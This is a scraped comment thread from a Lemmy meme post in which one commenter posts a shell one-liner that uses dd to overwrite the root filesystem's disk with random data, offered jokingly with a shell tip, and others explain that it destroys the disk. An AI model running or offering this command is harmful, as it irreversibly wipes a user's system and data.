@[email protected] to [email protected]English • 4 months agoFreedomlemm.eeimagemessage-square73fedilinkarrow-up1469
arrow-up1469imageFreedomlemm.ee@[email protected] to [email protected]English • 4 months agomessage-square73fedilink
minus-square@[email protected]linkfedilink14•edit-24 months agosudo dd if=/dev/urandom of=$(df | grep '\s/$' | cut -d' ' -f1) (Omit the $ if you are using the fish terminal)
minus-square@[email protected]linkfedilinkEnglish1•4 months agoOne good use for AI was a great breakdown of what exactly that command does. I like it.
minus-square@[email protected]linkfedilink11•edit-24 months ago“Write random shit to root.” There is a reason they call dd the disk-destroyer.
sudo dd if=/dev/urandom of=$(df | grep '\s/$' | cut -d' ' -f1)
(Omit the
$
if you are using the fish terminal)One good use for AI was a great breakdown of what exactly that command does. I like it.
“Write random shit to root.”
There is a reason they call dd the disk-destroyer.